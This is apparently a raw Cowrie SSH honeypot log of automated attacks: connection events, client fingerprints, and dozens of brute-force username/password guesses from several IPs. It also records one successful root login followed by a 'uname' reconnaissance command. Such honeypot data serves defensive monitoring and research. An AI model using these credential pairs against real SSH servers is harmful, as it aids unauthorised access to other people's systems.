{"eventid":"cowrie.login.failed","username":"admin","password":"password","message":"login attempt [admin/password] failed","sensor":"my-vps","timestamp":"2025-08-28T09:52:20.780221Z","src_ip":"51.79.164.132","session":"821e5f3ebd0a"}
{"eventid":"cowrie.session.closed","duration":"4.1","message":"Connection lost after 4.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:52:21.970793Z","src_ip":"51.79.164.132","session":"821e5f3ebd0a"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":40136,"dst_ip":"1.2.3.4","dst_port":22,"session":"6d5f51b1d569","protocol":"ssh","message":"New connection: 185.93.89.7:40136 (1.2.3.4:22) [session: 6d5f51b1d569]","sensor":"my-vps","timestamp":"2025-08-28T09:52:25.699076Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:52:25.708676Z","src_ip":"185.93.89.7","session":"6d5f51b1d569"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:52:25.716973Z","src_ip":"185.93.89.7","session":"6d5f51b1d569"}
{"eventid":"cowrie.login.failed","username":"index","password":"qqqqqq","message":"login attempt [index/qqqqqq] failed","sensor":"my-vps","timestamp":"2025-08-28T09:52:25.771749Z","src_ip":"185.93.89.7","session":"6d5f51b1d569"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:52:26.791886Z","src_ip":"185.93.89.7","session":"6d5f51b1d569"}
{"eventid":"cowrie.session.closed","duration":"10.0","message":"Connection lost after 10.0 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:52:28.041780Z","src_ip":"212.227.235.229","session":"1f974a9e069a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":33950,"dst_ip":"1.2.3.4","dst_port":22,"session":"4d5fa6667aaf","protocol":"ssh","message":"New connection: 212.227.235.229:33950 (1.2.3.4:22) [session: 4d5fa6667aaf]","sensor":"my-vps","timestamp":"2025-08-28T09:52:33.590935Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh-0.1","message":"Remote SSH version: SSH-2.0-libssh-0.1","sensor":"my-vps","timestamp":"2025-08-28T09:52:33.959427Z","src_ip":"212.227.235.229","session":"4d5fa6667aaf"}
{"eventid":"cowrie.session.closed","duration":"0.7","message":"Connection lost after 0.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:52:34.328333Z","src_ip":"212.227.235.229","session":"4d5fa6667aaf"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":56814,"dst_ip":"1.2.3.4","dst_port":22,"session":"87c975efcd15","protocol":"ssh","message":"New connection: 51.79.164.132:56814 (1.2.3.4:22) [session: 87c975efcd15]","sensor":"my-vps","timestamp":"2025-08-28T09:52:44.230834Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:52:44.351681Z","src_ip":"51.79.164.132","session":"87c975efcd15"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:52:45.006427Z","src_ip":"51.79.164.132","session":"87c975efcd15"}
{"eventid":"cowrie.login.failed","username":"steam","password":"steam123","message":"login attempt [steam/steam123] failed","sensor":"my-vps","timestamp":"2025-08-28T09:52:46.259527Z","src_ip":"51.79.164.132","session":"87c975efcd15"}
{"eventid":"cowrie.session.closed","duration":"3.5","message":"Connection lost after 3.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:52:47.715625Z","src_ip":"51.79.164.132","session":"87c975efcd15"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":37964,"dst_ip":"1.2.3.4","dst_port":22,"session":"2eb530eb227c","protocol":"ssh","message":"New connection: 185.93.89.7:37964 (1.2.3.4:22) [session: 2eb530eb227c]","sensor":"my-vps","timestamp":"2025-08-28T09:52:49.583026Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:52:49.583838Z","src_ip":"185.93.89.7","session":"2eb530eb227c"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:52:49.602504Z","src_ip":"185.93.89.7","session":"2eb530eb227c"}
{"eventid":"cowrie.login.failed","username":"index","password":"qazwsxedc","message":"login attempt [index/qazwsxedc] failed","sensor":"my-vps","timestamp":"2025-08-28T09:52:49.640674Z","src_ip":"185.93.89.7","session":"2eb530eb227c"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:52:50.692824Z","src_ip":"185.93.89.7","session":"2eb530eb227c"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":48398,"dst_ip":"1.2.3.4","dst_port":22,"session":"a5b1e5fa802f","protocol":"ssh","message":"New connection: 51.79.164.132:48398 (1.2.3.4:22) [session: a5b1e5fa802f]","sensor":"my-vps","timestamp":"2025-08-28T09:53:10.296476Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:53:10.420593Z","src_ip":"51.79.164.132","session":"a5b1e5fa802f"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:53:10.928798Z","src_ip":"51.79.164.132","session":"a5b1e5fa802f"}
{"eventid":"cowrie.login.failed","username":"es","password":"es","message":"login attempt [es/es] failed","sensor":"my-vps","timestamp":"2025-08-28T09:53:12.529216Z","src_ip":"51.79.164.132","session":"a5b1e5fa802f"}
{"eventid":"cowrie.session.closed","duration":"3.7","message":"Connection lost after 3.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:53:14.045362Z","src_ip":"51.79.164.132","session":"a5b1e5fa802f"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":53006,"dst_ip":"1.2.3.4","dst_port":22,"session":"fed83e0304c4","protocol":"ssh","message":"New connection: 185.93.89.7:53006 (1.2.3.4:22) [session: fed83e0304c4]","sensor":"my-vps","timestamp":"2025-08-28T09:53:14.281032Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:53:14.307844Z","src_ip":"185.93.89.7","session":"fed83e0304c4"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:53:14.308928Z","src_ip":"185.93.89.7","session":"fed83e0304c4"}
{"eventid":"cowrie.login.failed","username":"index","password":"232323","message":"login attempt [index/232323] failed","sensor":"my-vps","timestamp":"2025-08-28T09:53:14.670097Z","src_ip":"185.93.89.7","session":"fed83e0304c4"}
{"eventid":"cowrie.session.closed","duration":"1.5","message":"Connection lost after 1.5 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:53:15.761725Z","src_ip":"185.93.89.7","session":"fed83e0304c4"}
{"eventid":"cowrie.session.connect","src_ip":"51.79.164.132","src_port":57030,"dst_ip":"1.2.3.4","dst_port":22,"session":"d56a842dbc4a","protocol":"ssh","message":"New connection: 51.79.164.132:57030 (1.2.3.4:22) [session: d56a842dbc4a]","sensor":"my-vps","timestamp":"2025-08-28T09:53:37.063033Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:53:37.434824Z","src_ip":"51.79.164.132","session":"d56a842dbc4a"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-28T09:53:37.435585Z","src_ip":"51.79.164.132","session":"d56a842dbc4a"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":57920,"dst_ip":"1.2.3.4","dst_port":22,"session":"dda60d7826f5","protocol":"ssh","message":"New connection: 185.93.89.7:57920 (1.2.3.4:22) [session: dda60d7826f5]","sensor":"my-vps","timestamp":"2025-08-28T09:53:38.382064Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:53:38.385135Z","src_ip":"185.93.89.7","session":"dda60d7826f5"}
{"eventid":"cowrie.client.kex","hassh":"084386fa7ae5039bcf6f07298a05a227","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128,aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,arcfour256,arcfour128;hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128","aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","arcfour256","arcfour128"],"macCS":["hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 084386fa7ae5039bcf6f07298a05a227","sensor":"my-vps","timestamp":"2025-08-28T09:53:38.400189Z","src_ip":"185.93.89.7","session":"dda60d7826f5"}
{"eventid":"cowrie.login.failed","username":"index","password":"a1b2c3","message":"login attempt [index/a1b2c3] failed","sensor":"my-vps","timestamp":"2025-08-28T09:53:38.478727Z","src_ip":"185.93.89.7","session":"dda60d7826f5"}
{"eventid":"cowrie.session.closed","duration":"1.1","message":"Connection lost after 1.1 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:53:39.497923Z","src_ip":"185.93.89.7","session":"dda60d7826f5"}
{"eventid":"cowrie.login.success","username":"root","password":"1qaz@WSX","message":"login attempt [root/1qaz@WSX] succeeded","sensor":"my-vps","timestamp":"2025-08-28T09:53:40.172604Z","src_ip":"51.79.164.132","session":"d56a842dbc4a"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-28T09:53:41.085359Z","src_ip":"51.79.164.132","session":"d56a842dbc4a"}
{"eventid":"cowrie.command.input","input":"uname -s -v -n -r -m","message":"CMD: uname -s -v -n -r -m","sensor":"my-vps","timestamp":"2025-08-28T09:53:41.086096Z","src_ip":"51.79.164.132","session":"d56a842dbc4a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","size":70,"shasum":"7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804","duplicate":true,"duration":"0.2","message":"Closing TTY Log: var/lib/cowrie/tty/7ab552f01de999cb12092166cdc36fd68a0edbb33927e0ef3d26f4ee6449f804 after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:53:41.274306Z","src_ip":"51.79.164.132","session":"d56a842dbc4a"}
{"eventid":"cowrie.session.closed","duration":"4.2","message":"Connection lost after 4.2 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:53:41.275430Z","src_ip":"51.79.164.132","session":"d56a842dbc4a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":9007,"dst_ip":"1.2.3.4","dst_port":22,"session":"d4cf58b0e4cf","protocol":"ssh","message":"New connection: 212.227.125.160:9007 (1.2.3.4:22) [session: d4cf58b0e4cf]","sensor":"my-vps","timestamp":"2025-08-28T09:53:54.839253Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh2_1.9.0","message":"Remote SSH version: SSH-2.0-libssh2_1.9.0","sensor":"my-vps","timestamp":"2025-08-28T09:53:54.843855Z","src_ip":"212.227.125.160","session":"d4cf58b0e4cf"}
{"eventid":"cowrie.client.kex","hassh":"57446c12547a668110aa237e5965e374","hasshAlgorithms":"ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,curve25519-sha256,curve25519-sha256@libssh.org,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes256-cbc,rijndael-cbc@lysator.liu.se,aes192-cbc,aes128-cbc,blowfish-cbc,arcfour128,arcfour,cast128-cbc,3des-cbc;hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96,hmac-md5,hmac-md5-96,hmac-ripemd160,hmac-ripemd160@openssh.com;none","kexAlgs":["ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","curve25519-sha256","curve25519-sha256@libssh.org","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1"],"keyAlgs":["ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519","ssh-rsa","ssh-dss"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes256-cbc","rijndael-cbc@lysator.liu.se","aes192-cbc","aes128-cbc","blowfish-cbc","arcfour128","arcfour","cast128-cbc","3des-cbc"],"macCS":["hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96","hmac-md5","hmac-md5-96","hmac-ripemd160","hmac-ripemd160@openssh.com"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 57446c12547a668110aa237e5965e374","sensor":"my-vps","timestamp":"2025-08-28T09:53:54.902516Z","src_ip":"212.227.125.160","session":"d4cf58b0e4cf"}
{"eventid":"cowrie.login.failed","username":"admin","password":"antigone","message":"login attempt [admin/antigone] failed","sensor":"my-vps","timestamp":"2025-08-28T09:53:55.181280Z","src_ip":"212.227.125.160","session":"d4cf58b0e4cf"}
{"eventid":"cowrie.login.failed","username":"admin","password":"angelok","message":"login attempt [admin/angelok] failed","sensor":"my-vps","timestamp":"2025-08-28T09:53:56.243760Z","src_ip":"212.227.125.160","session":"d4cf58b0e4cf"}
{"eventid":"cowrie.login.failed","username":"admin","password":"angele","message":"login attempt [admin/angele] failed","sensor":"my-vps","timestamp":"2025-08-28T09:53:57.305123Z","src_ip":"212.227.125.160","session":"d4cf58b0e4cf"}
{"eventid":"cowrie.login.failed","username":"admin","password":"amnesia","message":"login attempt [admin/amnesia] failed","sensor":"my-vps","timestamp":"2025-08-28T09:53:58.368316Z","src_ip":"212.227.125.160","session":"d4cf58b0e4cf"}
{"eventid":"cowrie.login.failed","username":"admin","password":"allyson","message":"login attempt [admin/allyson] failed","sensor":"my-vps","timestamp":"2025-08-28T09:53:59.429960Z","src_ip":"212.227.125.160","session":"d4cf58b0e4cf"}
{"eventid":"cowrie.session.closed","duration":"5.7","message":"Connection lost after 5.7 seconds","sensor":"my-vps","timestamp":"2025-08-28T09:54:00.491381Z","src_ip":"212.227.125.160","session":"d4cf58b0e4cf"}
{"eventid":"cowrie.session.connect","src_ip":"185.93.89.7","src_port":37134,"dst_ip":"1.2.3.4","dst_port":22,"session":"132cac2fd655","protocol":"ssh","message":"New connection: 185.93.89.7:37134 (1.2.3.4:22) [session: 132cac2fd655]","sensor":"my-vps","timestamp":"2025-08-28T09:54:02.405337Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-28T09:54:02.409233Z","src_ip":"185.93.89.7","session":"132cac2fd655"}
